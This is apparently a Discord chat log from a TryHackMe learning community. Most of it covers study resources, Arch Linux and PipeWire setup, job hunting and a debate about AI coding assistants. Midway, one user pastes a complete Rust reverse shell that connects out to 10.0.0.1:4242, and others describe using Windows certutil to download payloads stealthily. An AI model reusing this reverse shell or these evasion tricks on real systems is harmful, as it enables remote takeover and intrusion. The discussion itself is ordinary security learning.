#general

thanks guys!!

sudo hacker spotted

Hi I'm trying to fuzz iot protocols for getting into security research.I don't have any experience in security research but know my way around networks and security (seedlabs,exploitedu).I don'tknow how to fuzz protocols to find vulnerability, how do I approach this as a research topic? My approach wos just read papers but that isn't getting me anywhere.Also what are the prospects in fuzzing research like what can I research by fuzzing iot protocols ,what are possible research areas , what is the chance of me finding a vulnerability using fuzzing approach and what can I infer as research worthy conclusions

Done for the day!

Good night everyone,
have a cookie 🍪

Good night dude
~$ exit

I see bell peppers in chat 🧍‍♂️

What is that face

terror

shock

amazement

That is the face of a creature that has never experienced genuine joy

a sandwich with sudo privileges

https://tenor.com/view/war-vietnam-ptsd-shell-shock-moment-gif-3022747568394546158

I've been lacking on THM as of late ngl

its ok,

Great job , seems like you're on a streak today 😄

Waiting on bro to finish that thought

Ah you're returned.

Sloboda is The Returned

yep

Can you please DM Jabba?

If he hasn't reached out to you.

he did not i think

or maybe i didnt get the message because of some skill issues

Possibly a privacy setting.

#general message

7 hearts, damn i am popular around here

It was very unfortunate to see you go.

But now you're back.

I missed the whole context of why you left, just that you had.

Particularly caustic chatters, tldr

Oh fr?

We popping the biggest bottles tonight

Is this for school/college/uni?

Ssean was banned.

well tldr is i cant handle amount of brainrot this chat can produce sometimes and all trolls being left with slap on the wrist

thats basically it

I must have not been here in a while

man just needs to chill sometimes

It comes and it goes depending on time of day and who all is around lol

Ah, that would be why Jabba would you like you to reach out.

i neither want or can to stay in unproductive place where there is drama 90% of the time

But yeah I’m here for the actual intelligent discussions which I’m quite happy to have here

me too

thats why i didnt want to perma leave

i met some great people here

Yeah. I've also met some right roasters.

I think that's a consensus a lot of the chat has reached. When THM chat is nice it's nice, but it has high highs and looooooow lows

Oops, that's my Scottish showing.

just had some nice pulled pork, also a good roast

https://tenor.com/view/doritos-glitch-bocchi-the-rock-dorito-glitch-infinite-glitch-respawn-gif-1525519049010070487

Being annoying should be a bannable offense

I personally think gif spam is annoying as heck, but we still want Berry around

no, being dick should be

Not sure about bannable. Maybe the guidelines on muting should be broadened a little bit to include some of the blatant cases, but that's not for me to decide

annoying is subjective

being moron is not

That’s low key a rule in most communities, although phrased a bit more tactfully lol

Just allow people to be.

man this website is paid :(

not enforced enough in my opinion

The problem is this is an educational environment.
Some people do not understand what behaviour is appropriate

It’s not fully paid.

Nah laissez-faire moderation doesn’t work lol

The majority of the content is free.
Avoid the learning paths, go via the other content

i know but i cant continue in some lessons because some of the rooms are paid

oh okay

i understand wording is different but i just am not able to find any nicer words that can better express how i feel about certain types of people

You can filter in the search for just free rooms and more, the room search is very powerful

thank you

but I will say, imho a sub is worth it, if it is viable for you to do so

i dont have money im a minor

I got into THM to brush up on infosec after landing a position and it’s been invaluable teaching me many topics and tools I use daily at work

totally fair

i sometimes log on THM to learn some stuff, school takes a lot of my free time

so getting a sub isnt worth it if i cant log on that often

mhmm, still hundreds and hundreds of free rooms off the beaten path

I’d say a majority of TMH’s content in total isn’t actually listed in current learning paths anymore for one reason or another

There’s also hundreds of free resources outside of thm to learn on too

Just be warned some will be higher quality than others

mhmm

You could honestly probably learn cybersecurity without paying a dime

paths are paid, but most of the ctf rooms are free

really? like what?

HackTricks Book site is fantastic

shout out to pwn college

https://book.hacktricks.wiki/en/index.html

Portswigger academy is a good place to learn web pentesting

Probably one of the best.

Hacker recipes too

👀👀

Been a god send for AD ctfs

Especially hackricks

Hacktricks, lolbas and gtfobins are probably my most 3 vistited sites for resources

Ive been slowly reading on gtfo

wow

PayloadAllTheThings is a great cheatsheet as well: https://swisskyrepo.github.io/PayloadsAllTheThings/

whats with the binaries?

Erm here we go: https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/

revshell is nice too

Wdym what is it with the binaries?

Gotta lock in today and complete 20 rooms so I can get to 0xD

like what are those?

lolbabs and gtfobins are for exploiting common system software for evasion and more

Programs basically

ohhhh

im a noob sorry

lolbabs are for Windows ant gtfobins are for Linux

No worries, that’s what THM is here for!

They're great for living off the land too.

mhmm

I always read gtfobins as a swear

You’re significantly more sealthy if you use built in system software for exploits and etc

you got this

hm, well i cant wait to understand all of this stuff, it sounds really interesting

good luck

a simple but fun example, Windows certutil can be used to base64 encode/decode and download your payload in a sneaky way

Despite being designed just to handle certificate management on Windows Server

i dont want to be mean youre really helpful but i dont know what youre talking about this is too advanced for me😭😭

You’ll get there

No worries, THM even has rooms on this and similar

you will understand in no time no worries

logs that connect to shells are very obvious if not encoded to blue team people

but yeah lolbabs shows you how common built in software can be abused like this

I broke youtube lmao

as referenced above, it’s called “Living off the Land” since you’re just using the software that’s already on your target machine

^ This could be helpful in an AD setup

Just you wait, if you keep at this long enough and Microsoft defender starts detecting your own Markdown note files for the reverse shells and other common exploits, then you’re doing it right lol

Speaking of AD but thinking from defender/blue team perspective, PingCastle and PurpleKnight are fantastic software packages for auditing your AD security. Also used for offensive purposes in real threat actor campaigns, despite how noisy they are

Actually thinking of that, I need to run PingCastle on our new client’s AD infra to see how that stacks up on Monday

good luck

I’ve seen some horrors uncovered in the past like service account tied Domain Administrator back in Server 2003 which would have allowed for easy escalation had I not wiped that connection out

I need to read more about active directory stuff as i did the module but was still super confused

I can’t remember what the word for that is, just bringing that up off the top of my head

🧠 🔥

I disappear after droping a 'wadupp'

How're you KGB

spotted the iOS user c:

Thanks for asking good , how about you 🙂 ?

Gave +1 Rep to @fiery imp (current: #606 - 9)

I'm good mate

@sick lance please see above

Glad to hear that 🙂

Done!

Danke!

Thanks 😄

Gave +1 Rep to @sinful moon (current: #34 - 280)

Just did this room on thm
https://tryhackme.com/room/dailybugle

When one appears, I'm expecting more.

Old but gold 🙂 .

Yet again a reminder that if you don’t feel like removing the embed after the fact, you can encapsulate links with < > to remove the embed

Yeah

ohh..my bad. I'll do that

Would be cool if THM embeds actually showed room info tho

Yeha no worries, I’m just being anal since it takes up so much room lol

Ty for letting me know!

Gave +1 Rep to @sinful moon (current: #34 - 281)

btw i tried the ssh proxy you mentioned when you talked about your arch box

Anyways back to my point, I do hate how iOS keyboard doesn’t actually use the true ` backtick in its keyboard in an effort to be typographically correct

i like it so much

never looked back honestly

that whole setup is just amazing

Although laughs on iPad with logitech physical keyboard where I can do proper nmap style backticks all day long

Although that brings me around to my next complaint, it’s been years now Discord, when will mobile get code block syntax highlighting?

It’s especially silly on iPads where this looks like the full desktop interface for Discord, but still can’t do some niche Desktop features like that due to a completely different software stack

you can see this with pretty formatting on Desktop, and I can create this via mobile, but I can’t see the syntax highlighted result lol

use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

fn main() {
    let s = TcpStream::connect("10.0.0.1:4242").unwrap();
    let fd = s.as_raw_fd();
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}

for all the mobile users

lol thank you, like I even set it up to do that but I couldn’t see the pretty results without another machine

(Just a Rust reverse shell since I still had PayloadAllTheThings open from ealier)

Ouch using unsafe on Rust but it’s understandable in this case

Oh yeah, how did that work out? Probably just fine I’d gather

My mobile device is clearly superior

nice sideloading bro lol

lmao I'm not

what did they actually add it to react on Android only?

I think it's iOs that doesn't do code blocks as pretty as Android

For years and years Android couldn’t either

so that must have changed in the two years since I switched

Trust me if I were to be side-loading it I wouldn't post it publicly on here

I remember telling you this 😅

worked out surprisingly well ngl, workflow got a lot more easier ngl

Yeah I just use aliases to automate it and call it a day, it’s lovely

since i dont have to switch from vm to host every 10 minutes

mhmm

my VM doesn’t even have a graphical display so it’s invaluable to ssh tunnel either web traffic or RDP traffic locally

kvm vms are pretty seamless but its lot nicer when i can just use terminal on host with tmux

mhmm, I do love me some qemu/kvm, with Proxmox being my current home lab virtualization host

i run burp on host

rpd works nice over proxy too

everything just works

mhmm, I typically do this on my side work from home Mac Mini and it just werks once Burp and Microsoft RDP is setup

I wish Remenemia RDP client or however you spell it was avaliable on Mac though

so freaking good on Linux

although i am a bit sad because caido has some issues with remote dns

"Remenemia" 😂

lol an attempt was made

It's such a stupid word for a tool.

I don't know who many times I give two n and two m's

i couldnt find proxy option in remmina due to skill issues 😭

I ended up just creating an alias 😂

but i found xfreerdp has proxy option

It’s the same way as you’re doing now, once you set up the ssh tunnel for RDP traffic, just tell it to target 127.0.0.1:13389 or whatever

i just do this

you don’t need that feature built in, I literally just use the Microsoft RDP client on macOS to do this

I also stuck it in the panel

i run headless as of right now

my third line there

you have to edit the 11.11.11.11 with your target IP each time

with 10.10.10.10 being your attack machine/VM

xfreerdp /v:10.129.201.55 /u:htb-student /p:HTB_@cademy_stdnt! /proxy:socks5://127.0.0.1:9050 /f

i just do this for now

works fine

mhmm that is for sure another way to do it, but this works with all RDP solutions under the sun

and as for proxy i do this

alias kaliprox="ssh -i ~/.ssh/kali -D 9050 -q -C -N styx@kali -f"

https://adrian15sgd.wordpress.com/2012/11/21/remmina-for-mac-os-x-build-instructions/

Oh I’m sure you can but laughs at Mountian Lion era and basic GTK2 UI there

But also I don’t really have a need for it

I was just having fun whining

Your words, not mine. 😄

mhmm lol

But yeah I will say macOS makes for a fantastic *nix and infosec companion in my work from home setup. I have it on our personal network instead of the work network so I can verify firewall rules and more in a completely unconstrained/not allow listed enviroment

Although lol 95% of that is just sshing into my real Linux pentesting server anyways

also one big thing that this helped me with is being able to reduce amount of resources that i need for vm

but yeah I set up a similar Virtual Private Server at work for OpenVAS vuln scanning of our clients which isn’t allow listed at all

mhmm headless Linux VMs and servers are just love

I do hope you’re using our lord and savior tmux when you’re working on these

but i still gave it 8 cores 😂

lolol

of course

cant live without tmux

Yeah I over provisioned my first VPS for pentesting, I think 4 cores and 2GB of RAM or so, but still love it

8 cores just for the memes and 4GB of ram

since i decided mid installation i will do headless

actually I can check via my last screenshot of it

Yeah I was correct there

https://cdn.discordapp.com/attachments/680459914828972076/1329663052030672927/Screenshot_2025-01-16_at_7.png?ex=67b35e77&is=67b20cf7&hm=b73a8da45b61a348313313309fd6a1ca68b52cf22f16d0369ed22e95e4647973&

my tmux setup at the bottom there

How do you get this terminal frame thingy, by the way?

mine is default with just changed color

I see these screenshots all the time and I always wonder how to.

frame thing? That is just tmux?

thats mac i think

Including the window menu with the buttons at the top?

Ah, fair.

Oh if you mean the alpha transparency in the png that’s just via built in Screenshot utility in macOS

Prolly just a window screenshot then.

mhmm

is tmux status transparent or black

iirc I set it to black or none. I ported my classic .screenrc theme by hand

Man, I fully committed my Desktop to Arch today, and while everything works as intended, I am missing UTF-8 icons again, arghghgh.

noto-font and noto-fonts-emoji, optionally noto-fonts-cjk if you run into eastern languages tons

Then just use noto-fonts as system UI and call it a day tbh

only issue i have with it is this

Already got all of nerd-fonts installed, want to go for font-awesome as well. That should cover everything.

when terminal sometimes goes whack

But do I install ttf-font-awesome or otf-font-awesome?

and status doesnt sit perfectly at the bottom

ttf is fine, otf vs ttf is kind of up to you

TTF is more well supported by all OSes, OTF is more open but limited support

Yea, reading up on the difference right now.

for Linux it more or less doesn’t matter

OTF it is.

mhmm totally fair

If it breaks Imma just swap it.

Thanks for the input tho. ^_^

Gave +1 Rep to @sinful moon (current: #34 - 282)

but do install something that covers most of UTF-8 and best canidate for that is Google Noto fonts

mhmm np!

you can always be like me

whew

I do think I already got you beat on that.

Dunno how large the nerd font collection is, but I just installed the entire package group.

Even when I’m in my graphic design obsesions (nearly went into it) I never had that many fonts

Also Fira Code, best coding font.

But yes typography and the theory, design, and tech behind it are things I’m a huge nerd for

I use Hack which is very similar to Fira Code

jetbrains or iosevka

fira is mid

But yeah I prefer Hack due to some changes and more vs Fira Code

Well.

Turns out there's a lot of fonts.

that’s barely scratching the surface even in Arch

But does that do the cool thing where it turns -> into a single character arrow and != into a crossed out =?

we call those programming ligatures

This is why I like Fira Code.

I started Linux it’s not so difficult right?

I personally don’t like them because they are less clear than the literal characters

Naa, you'll be perfectly fine.

Just be prepared to learn as you would with any new OS, and best way to learn is just using it

i use iosevka

Fair, I suppose, different taste. The great thing is that nobody qho does not also use a font like that will see the recoded characters.

i like tall letters

when you have a question, just google it, there’s thousands of results for any question you will have

I see it has the same features.

idk how to describe it

Perfect

Can you gimme a screenshot?

all nerdfonts do

Ask a lot of questions.

I used to swear by the bitmap font Profont which is just lovely, but with resolutions increasing and UTF-8 getting more important I finally made the switch to TTF about a decade ago

its not tall but idk how to describe it

so so so much has changed even just in the 18 years of Linux use I’ve had alone

I started out with sys v init and HAL, urxvt, screen, archfetch.sh, kernel 2.6.26, ALSA instead of Pulse or PipeWire, etc etc

vim instead of neovim, a lot of these I had to be convinced “fine, it’s finally time for me to change” other upgrades I was excited about

That's why I asked you to show it.

PipeWire I adopted as soon as it was made standard in Fedora, frick PulseAudio

kernel 2.6
That's fine, IoT stuff still uses that lol

lolol

You’re sadly not wrong

that’s some mid 00s vibes right there

Pulseaudio works for me, I suppose.

Literally no reason not to use PipeWire since it’s a drop in replacement

More familiar with its CLI controls.

jut with lower latency and better fundimentals

PipeWire

Argh, ok, sure, I'll look at it.

Nice, yeah I highly recommend it

Plus it’s how Wayland screen recording permissions work and more

Any good CLI tools for it?

Need hyprland keybinds for volume control.

yes there’s similar terminal UIs as before

or yes just raw things you can use for keybinds

Not looking for TUIs.

you can even use the same pulse commands probably and it will respond, I’d wager at least

Hmm, doubtful.

you can use Pulse UIs with PipeWire without the app knowing the difference

pactl seems like a very PulseAudio specific thingamajig. xD

Wait, you can?

Wild.

nah that will work with PipeWire

literally a drop in replacement

I see, I see.

# audio controls
binde = ,XF86AudioLowerVolume,exec, pactl set-sink-volume @DEFAULT_SINK@ -1000
binde = ,XF86AudioRaiseVolume,exec, pactl set-sink-volume @DEFAULT_SINK@ +1000
bind = ,XF86AudioMute,exec, pactl set-sink-mute @DEFAULT_SINK@ toggle
bind = ,XF86AudioMicMute,exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle

this works for me

Well, that is awfully convenient.

as long as it’s all client side Pulse stuff, it works with pipewire

Ah cool, I got more or less the same setup.

One moment, Imma just swap it out and see whether everythng still works.

lol inb4 everything breaks, but it historically hasn’t for me

just make sure to follow Arch Wiki PipeWire guide when doing so

The heck.

hehe

Guess I'm not disableling it?

that song and video is good

that’s a common issue due to the symlinks iirc

Well, there is, but according to everyone around me, there is a better way to have sound. xD

@Bit

# Fn keys
bind = , XF86MonBrightnessUp, exec, brightnessctl -q s +5% # Increase brightness by 5%
bind = , XF86MonBrightnessDown, exec, brightnessctl -q s 5%- # Reduce brightness by 5%
bind = , XF86AudioRaiseVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ +5% # Increase volume by 5%
bind = , XF86AudioLowerVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ -5% # Reduce volume by 5%
bind = , XF86AudioMute, exec, wpctl set-mute @DEFAULT_AUDIO_SINK@ toggle # Toggle mute
bind = , XF86AudioPlay, exec, playerctl play-pause # Audio play pause
bind = , XF86AudioPause, exec, playerctl pause # Audio pause
bind = , XF86AudioNext, exec, playerctl next # Audio next
bind = , XF86AudioPrev, exec, playerctl previous # Audio previous
bind = , XF86AudioMicMute, exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle # Toggle microphone
bind = , XF86Calculator, exec, ~/.config/ml4w/settings/calculator.sh # Open calculator
bind = , XF86Lock, exec, hyprlock # Open screenlock
bind = , XF86Tools, exec, alacritty --class dotfiles-floating -e ~/.config/ml4w/apps/ML4W_Dotfiles_Settings-x86_64.AppImage # Open ML4W Dotfiles Settings app

bind = , code:238, exec, brightnessctl -d smc::kbd_backlight s 5+
bind = , code:237, exec, brightnessctl -d smc::kbd_backlight s 5- 

Wait, now I am confused.

Why are they both running?

lol pipewire probably got pulled for something else as a dep

Thanks to you as well, my current set of keybinds already works.

Gave +1 Rep to @loud marlin (current: #25 - 389)

^_^

Meanwhile I’ve gotten less cool and just configure my keybinds in my DE

Still sort of want to disable the pulseaudio daemon to see what happens.

just lol do consult the wiki to prevent breakage as I mentioned

But I cannot because I don't know it's damn name, whahaha.

they should have info for dealing with existing Pulse

Wiki is a good call.

Thanks guys

Gave +1 Rep to @rugged kayak (current: #213 - 36)

Sorry i was eating

if you disable one. you need first to tell what of that two to use as default before disable one

Right, the daemon runs in userspace.

systemctl --user stop pulseaudio did the trick.

ay my rep was saved nice

yep there you go and that makes sense

lol thinking of my ancient Arch history lets see if I can find that screenshot

lol there we go, Openbox and Arch back in 2008

That is so tiny and also square for some reason.

Very clean and minimalistic tho.

it’s because it’s on a 1600x1200 4:3 screen on a Dell laptop from 2002

which is a crazy high res for the era

even in 2008 tbh

hi elizabeth

heya!

how ya doing

Pretty well, enjoying a lazy sunday chatting here and having rain white noise via iOS accessability features

very moce

nice

im working on a bit of music rn

If anyone didn’t know, this is built into iOS and macOS, and you can put a hearing accessibility option in control center for easy access:

cool i didnt know!

Yeah kinda killer hidden feature

Alrighty, that was easy.

Audio now runs on pipewire.

Yep, literally drop in replacement, glad to hear it!

Just gotta add that to my ansible setup thingy now.... Urgh.

everything that references ALSA, PulseAudio or JACK APIs will now be interacting with PipeWire transparently instead

When I choose pipewire during archinstall, will it still ship with pactl?

good afternoon

Good afternoon.

I don’t think so but you can install pactl on its own anyways I believe

Well....

Not really, maybe from the AUR?

I don't like the AUR.

Wonder what the corresponding tool for pipewire is, might as well fully commit at this point.

Yeah just read the wiki tbh

but psh not liking the AUR makes you slightly unhinged

I can understand it for this specific case but whew

That’s like part of the whole appeal of Arch

I was an AUR maintainer for multiple packages for years

I think it's cool what sort of stuff you can install from there very easily, but I have trust issues regarding the security of the packages. xD

Ok, wiki also says pactl. Guess they are not replacing that part of the setup.

that’s why you always read the PKGBUILDs which solutions like yay/paru force you to

Yea, I know.

Paru is lovely.

mhmm that’s my current solution. I’m loosely an acquaintance with the dev

This is taking longer than I expected

I will be honest though, I’ve used so many AUR helpers over the years as times change I just have an alias for update lol

I do that as well.

search and pinstall (had to, because install is a command already), and update and so on. xD

Congrats! You can force the update to happen on Discord by re-registering your Discord to THM verification

Otherwise, just wait a day

you need 900 i need 6000 for next level

Hey hacker pals uwu

I still need about 800 points

hello hello

How're we

Ah yeah I mistread that

I am missing like 20k, it does not get any better.

The scariest jump is the next one, from 20 to 35

That will take a bit

Maybe someday the roles higher than 0xD will actually have their own colors

How has chat been the past few days?

Alive, wby ?

we are waiting for admins to invent new colors

Anyways, just got this cool looking new game, so I will be playing that now.
Thanks for your help.

Same as it always has been lol

we are free from the ssean menace

no regrets there lol

Currently, they are all green. And also don't have access to the advanced channels.

I swap between rage and moroseness

it was great if you ask me 😂

What happened?

idk i wasnt there

Wahoo

If you’ve seen their interactions it only takes a tiny bit of imagination to understand how lol

part of me wishes i could see what broke the camels back but i shouldnt be this drama addicted

I think I was there for day one where they instantly stood up for a nazi troll right after they joined, and couldn’t actually defend their point beyond “free speech” lol. Discord is not free speech yo

Hello! Did you know that AI can analyze video like a human ex. basketball match and send information about it to user?

lol yea should have been banned first day

Many such cases 😔

Hellllloooooo chat!

are you a real person

I’d agree, but I can at least say that I can understand the moderators wanting to at least give them a chance

Any dropped wallets?

Hey, we should allow hate speech in a privately owned platform cuz uh ... My rights!

i carry everything on my purse

I don't have any money leave me alone

Awh man :(

free speech, doesn't mean free of consequences 😉 😂

Good thing those people aren’t in a place of power in the US government

that too lol

that as well, erm I misread

Yuh

Hey lieutenant Kim, how are you?

I am about to do late night ctfs

Yay!

I have some uh, bad news tho, @fallen burrow

I know I know 😦

couldnt sleep this night so im laying low for today

yupp 😉 just asking

As a detective I don't sleep

Wanna do ctfs?

Meanwhile poor Ensign Harry Kim never progressed in his role in seven years on a starship

I live off of Alani and boiling showers.

the long arm of the law 😂

Oh and vape juice.

Oh I do PI OSINT type stuff, I'm not a LEO

which room?

You got mail

If you’re serious, that’s really neat

U like osint?

Yuh. I help people find things.

It's not super glamorous and all above board.

It makes me feel like I'm big brain

lol one of the things the Noir in my name is for is for Film Noir so no complaints

i havent done anything on phishing though

Say potatoe.

I have a cool jacket for it too.

Wanna try my osint room then?

Can’t be a PI without a badass trench coat and etc

"Say Potato, Elizabeth"

Neither have I!

Let's suffer together

@sinful moon

ok then

Sure I can try it when I get to studying TN or tomorrow

But rn i am making food

Nice nice!

sure i gotta finish the episode im wwatching too

My mom found it at a goodwill and I looked up the brand and it's website is sketch lmao

0i, I said potatoe.

Potato Potato, same difference

I gotta run a self defense class for my fellow gays then make some dinner.

So I may try the osint room later

It’s pronounced potato tho

Patatoh

I have really low motivation seeing that there are no job offers for juniors in cybersec of any kind be it pentest, SoC or Security Engineer. How can I motivate myself? Any ideas?

what got you into this field in the first place

SAY POTATOE

Kk, one sec

whew just got a flash back to the mid 00s Flash vibes: https://youtu.be/ihMMw0rnKz4

I was doing it in the job I was laid off from but it was only basic stuff like threat modelling, risk registry maintaining and sla maintaining

If that was question for me

yep i asked you, but i asked you this so you could reflect on yourself why you even started and find that spark that got you into this field in the first place

May want to try #cyber-and-careers though as this will probably get buried

Well I like cybersec but after 3 years of tedious paperwork I see that no one wants to hire me as I have zero experience so my motivation is hitting the ground right now. Second month and no job offers to apply for.

i dont want to discourage you but cyber is not entry level field, you need at least some experience in IT

Tried, it's basically dead

I would highly agree with that

I have some experience in IT

You're Bri'ish, you said Po'a'oe

https://tenor.com/view/bottle-of-water-saull-gif-26356875

most SoC jobs require at least 1-2 years of experience, pentester is also mid-senior level position

Help Desk is often looked down on but it’s highly valuable experience. Swift On Security constantly talks about how he started in Help Desk and how it informs and helps him in his infosec roles

Away back and make your tea in the microwave.

https://tenor.com/view/get-away-satan-not-today-gtfoh-go-away-gif-22984661

Cool but how an you gain experience if no one want's to hire you to gain such experience?

you know the drill

helpdesk mainly

Again you find those entry level jobs, but it sounds like you already have some experience under your belt

but either way it can help to just get your foot in the door

There are no entry level jobs there are only mid-senior as mentioned above

I very rapidly went from help desk to infosec and sysadmin after I proved myself at my current job

Smaller orgs can also help

This exactly

I’m at a very small org which kind of means you get to do it all, and looks amazing on your resmume, but be careful not to bite off more than you can chew

Windows sysadmin, Linux sysadmin, infosec everything, compliance management, devops, etc, I kind of do it all

I have worked as software tester for 2 years, programmer for 2 years, devops for 1 year and pseudo cyber sec for 3 years. No one wants to hire me.

I am literally the SOC manager… but lol our SOC is outsourced anyways

I’m just the final stop for that

they always say they want someone more experienced... -_-

yes

https://tenor.com/view/thief-stealing-stole-cat-kidnapping-gif-13580660

Mine now

yea job hunging can take quite a while

Set your expectations lower and get your foot in the door before advancing up the ranks if possible. Two months is also a low timescale with how bad the market is right now

i just applied for devops internship, do you have any advice for me if i get the interview or a job even

I've been trying to get security engineer and SoC and nothing. I just started learnign pentesting so I do not even try for such positions not to make a fool of myself,

Got my job interview on Thursday

Need to rehearse my presentation

Learn azure, aws, git if you can in your job.

mhmm

also docker and kubernetes

git i know well, i have some experience with docker and setting up linode instances

It is magical when boss is like “uh I need a single server serving three legacy web clients, can you do that”, two days later I have a Docker Compose config just for that

try to automate as much as you can but test it out not to mess up and do not tell anyone you did automate your job

docker compose is goated

Use Copilot AI

i have script that installs my arch dotfiles 💀

There are programs that already do the same thing, but fair enough

It's not a bad idea. I use ai a lot but doublecheck what it returns. It really helps to rapid prototype scripts

You can’t hide from the future man @sinful moon

Future man required checking behind him to make sure his work is correct

like asking an intern to code something up for you

It’s more about getting tasks done quicker, and spending less time on repetitive tasks

this ^

Not getting it to do work you don’t understand how to do lol

ai makes easy tasks easier and hard tasks much more harder

Just god forbid if you don’t notice a vulnerability that’s being entered into the codebase over a simple “well I didn’t actually code this myself”

dont use ai for coding or you will start to suffer from skill issues pretty fast

As an industry professional who doesn’t rely on AI, you should easily be able to spot when AI makes a mistake

i tried copilot and i was getting work done a lot slower and it just started annoying me and getting in my way

people want to write code, not do code reviews of garbage that ai produced

Yeah while it can give you solution, I’d just re-code them yourself under more ideal circumstances

People can use AI just fine IF they understand the code that it returns and know what it does. For me asking AI to write to do something in python and then fixing issues if it does not work and sometimes optimizing it is easier than wasting 4 hours to search for libraries or scroll throught documentations.

Why do you assume AI can only be used for generating code? 😆

bro u started talking about copilot first

“what’s wrong with my code” is a far way off from “code this for me”

i did not assume, its currently its most common use case

and i am speaking as developer therefore i will talk about ai and coding

But it also helps to understand what is wrong with the code too.

yes I was speaking in support of such

i say if you cant read code you have skill issues

but that is just me

try to feed ai with random java 50 lines exception it will explain it to you like you are five

Realistically we are just not there yet imho

it can be a helpful tool, but needs mountains of human oversight or things go wrong quick

Can also run afoul of open source licensed code and more it was trained on, sometimes used verbatim

Lmao what? Again, it’s a tool, not a replacement. Idk about you but I’m all for a tool that can speed up both development and learning

asking ai to analyze you a piece of code is you avoiding learning

i really dont want to use it so i dont end up addicted

ai makes mistakes

Meanwhile I personally see it as a handycap where people are just accepting the results with a quick once over and commiting

reading code is necessary skill

Not a reason not to use it. Not all sources on the internet are true 🤷🏽‍♂️

i am not speaking from internets sources i am speaking from my experience

That’s true but typically people are being more skeptical about these posts than AI “magic”

for example i had to fix a feature on some golang framework with text wrapping

No it's not

i asked gpt and it gave me bullshit

^

i had to read the code to understand it

https://www.theregister.com/2025/02/11/microsoft_study_ai_critical_thinking/

No I will disagree there, “whats wrong with my code” is a much better use of AI then “generate some code for me”

It's not all black and white guys

https://www.theregister.com/2024/01/27/ai_coding_automatic/ also

ai is simpy a tool, doesnt mean its a good one

Some of the top fortune 500 companies are using AI to help their development teams analyse code

copilot is just a llm

mid llm

Yes Microsoft claims that 30% of their code is now AI generated that that’s terrifying lol

Enron was fortune 500

Look what happened to them.

indeed lol

sloboda might've had a bad experience with ai, I can tell

I've seen someone outsourcing all their thinking to AI

It's... Scary

imho no matter which way you stand, it’s healthy to bring some skepticism and critical thinking into the mix

Hold on. Ai is thinking up a response for me

Yes Adobe Illustrator is quite neat lol

i mean look at the whole devin scam

I don’t think you can blame AI for the downfall of a company lol

6 months old startup worth over 2 billion

Why not?

(you didn’t capitalize the I, and traditionally Ai is adobe)

not yet maybe

I wasn't, funnily enough that was 2001 or so...
It's a point about Fortune 500.

you blame the greed c-suite for firing the working force

ai is cheaper than devs

if you fire dev over ai you deserve to fail

For example here https://www.perplexity.ai/search/explain-this-code-to-me-interf-tYfjBg3TQb6x8AlyNOzBvQ#0 AI can help someone to understand code by explaining what it does and how it does it.

Or you buy the team copilot licenses for the devs to support them and retain them as loyal employees 🤔

Difference is what you take from the output.

Honestly AI for uses like that are just a fancy search engine and should be treated as scuh

idk about yall but I don't like the word "AI"

With a copilot license?

mhmm, LLM is much more descriptive

yea like i said, grow addicted to it and wont be able to code without

damn that share button is broken again, fixed the link

If they use it effectively, they will save themselves time, have more of an impact, contribute to the company’s success

yeah, that's the same reason i don't chat gpty

While LLM are helpful, it can also cheat yourself out of the critical thinking and problem solving required for a task

Yeah that is a concern, people are becoming reliant on AI too

Just like on THM, why cheat answers, you’re cheating yourself out of the education

you cant effectively use chainsaw for job that requires a scalpel

this is what i am saying too

sometimes you need to chop down a tree before carving a toothpick

On the flip side, yes AI/LLM is helpful and can be a game changer to some, but you need to read it as if your dumb intern wrote it

I'm such a great poet

Me too

When it works.
I hate Google's integration of AI, if I listened to it, it would have killed me with electrical safety misinformation.

code analysis for exmaple, i will just spit you out the answer you need

you didnt do any work

You can use -ai when googling to hide the AI response iirc

tell it to do otherwise

It's just a tool. Tools are made to make works easier. Would you say a farmer cheats because he uses a tractor instead a plow?

yes

Literally this

That’s not a great analogy at all

It’s not great it’s the greatest

i do sometimes use it to explain me what some code does though

That’s like saying that if you’re not using AI to “plow your fields” you’re backwards and doing it wrong

not great, not terrible

I've lived through the crypto fad.
This too shall pass.

indeed, we all have

Both times, Nvidia selling the shovels...

suprised people haven’t learned from NFT and crypto era

@wooden totem Our backups are safe, it isn’t a dream. Immutable backups, backed up by Veeam

Or even better. People shouldn't use Visual Studio, IntelliJ or any kind of IDE because it is cheating. They should use notepad or vi to code. Automatic suggestions? lint? Cheating!

thats just a hype train, it happened millions of times throughout history

Oh god crypto

I will say that at least AI has some small tangable benefit in comparison to the above though

Don't bring that shit storm back

but this is nothing new

look back at mid 80s episodes of The Computer Chronicles and it’s AI this and AI that

Ai can be useful, where it's used in Hospitals and such.

Or anywhere

But it's been used there long before it was used for code.

yup totally, beep boop thingamabob works yes, excellent

AI sure didn’t change the world in the 80s and it remains to be seen if it impacts things meaningfully now other than bad code

There’s no doubt as to why millions of companies and individuals are adopting AI, and why it’s already becoming integrated with some of the world’s leading tech.

Because it's the latest fad.

hype is why

No it’s not

AI addicts when they gotta think for themselves 😱

helps their profit margin and stock market valuation

Hyprland workspace management is kinda cringe, not gonna lie.

Did Apple of Microsoft release a software update when NFTs were popular?

saying you use AI is the key to boost your market valuation in the stock market

No but game companies sure did

and fell flat on their face

lol

No because NFT's were shit

It’s a $196 billion industry

just like the metaverse was

AI at lest as the potential for something, but we’re not there yet

every time someone copy and pastes code from ai without knowing what it does, an angel loses their wings

Except it did. Google R1 at Digital Equipment Corporation and XCON

Ai creates lazy students,.who carry that out from beyond their studies.

Those were decision making applications and nothing like the AI we’re familiar with today

If you know how market caps are actually calculated, you would know that this is a lot of hot air.

it was considered AI at that times and they were created while working on AI

Seems to be a lot of bias towards AI preventing learning and cheating. AI also helps to save lives, prevent fraud, so many good things that aren’t being mentioned here

well that is true, AI has helped the medical field a lot

iirc the term was “expert systems” in the 80s because they were supposed to help you make decisions as if you had an AI expert on the team

its just as a student I see the laziness up front in my daily life

But realistically they were all pre-fed answers in a matrix of if;than;else statements

would a lab-created brain be counted as AI?

Ai used to detect brain anomalies is more useful than teaching somebody how to code, or write a report.

